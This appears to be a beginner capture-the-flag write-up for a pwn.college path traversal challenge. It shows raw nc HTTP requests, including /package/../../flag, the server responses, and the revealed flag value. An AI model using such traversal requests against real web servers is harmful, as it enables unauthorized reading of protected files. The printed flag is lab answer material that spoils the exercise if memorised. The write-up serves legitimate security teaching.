π΅οΈββοΈ Challenge: Path Traversal 1
Writeup from Web Security
Category: Web Security
Platform: pwn.college
Level: Beginner
Vulnerability: Path Traversal
Goal: Read the flag file by bypassing path restrictions.
𧩠Description
We are given a web challenge running locally on port 80. The /package endpoint is accessible. Our goal is to read the flag file, presumably located outside the /package directory.
π Recon
Letβs start by sending a simple GET request to /package to understand the structure.
printf "GET /package HTTP/1.0\r\nHost:challenge.localhost\r\n\r\n" | nc challenge.localhost 80
Response:
HTTP/1.1 200 OK
Server: Werkzeug/3.0.6 Python/3.8.10
Date: Sun, 20 Jul 2025 03:49:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 25
Connection: close
Welcome to Web Security!
The server responds positively, meaning itβs up and running. No sensitive data yet.
πͺ Exploiting Path Traversal
We suspect a path traversal vulnerability, so we try escaping the /package directory by adding ../ sequences to access files outside.
Try accessing ../../flag:
printf "GET /package/../../flag HTTP/1.0\r\nHost:challenge.localhost\r\n\r\n" | nc challenge.localhost 80
Response:
HTTP/1.1 200 OK
Server: Werkzeug/3.0.6 Python/3.8.10
Date: Sun, 20 Jul 2025 03:50:14 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 60
Connection: close
pwn.college{UosMRPRfp9lbdsK84mhqTH7DQEO.QX3gzMzwSM0IzMyEzW}
π We successfully accessed the flag file via path traversal.
π Flag
pwn.college{UosMRPRfp9lbdsK84mhqTH7DQEO.QX3gzMzwSM0IzMyEzW}